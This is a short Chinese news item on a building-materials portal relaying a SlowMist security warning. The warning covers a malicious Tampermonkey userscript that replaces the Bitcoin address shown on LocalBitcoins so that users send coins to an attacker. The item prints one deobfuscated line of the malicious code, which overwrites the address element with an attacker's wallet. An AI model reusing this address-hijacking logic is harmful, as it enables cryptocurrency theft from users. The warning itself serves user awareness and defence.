内参商机
慢雾:警惕 Tampermonkey 扩展的恶意 JavaScript 插件劫持盗币攻击
2020-11-05  浏览:109
区快洞察消息,据慢雾区情报反馈,有人在 LocalBitcoins 进行交易时,被诱骗使用了一段所谓增强的 Javascript 插件导致被盗比特币,该 Javascript 插件可以在浏览器知名扩展 Tampermonkey (油猴)上方便使用。一旦使用,该恶意 Javascript 即可篡改用户在 LocalBitcoins 上的比特币地址,达到劫持盗币攻击的目的。这段恶意 Javascript 代码进行了多层加密与加花处理,肉眼看不出恶意行为,通过 xssor.io 进行解密后可以清晰看到「劫持盗币」的核心代码:document[_0x66e1x6("0x0")]("bitcoin-address bitcoin-address-controls")[0]["innerHTML"] = "1Ak8db781gfM3QutGwFsKuZg7YeUEoCvPw。

联系方式
建材之家小程序码

建材之家小程序

建材之家服务号

微信公众服务号

建材新媒体

建材新媒体

更多»您可能感兴趣的头条微商机:
更多»有关 的产品:
移动社区 屏风头条 装修头条 风水头条 楼梯之家 布艺之家 风水之家 板材之家 模具之家 防盗之家 新型建材 老姚之家 灯饰之家 电气之家 全景头条 照明之家 防水之家 防盗之家 区快洞察 建材 漳州建材 泉州建材 三明建材 莆田建材 合肥建材 宣城建材 池州建材 亳州建材 六安建材 巢湖建材 宿州建材 阜阳建材 滁州建材 黄山建材 安庆建材 铜陵建材 淮北建材 马鞍山建材
(c)2015-2017 Bybc.cn SYSTEM All Rights Reserved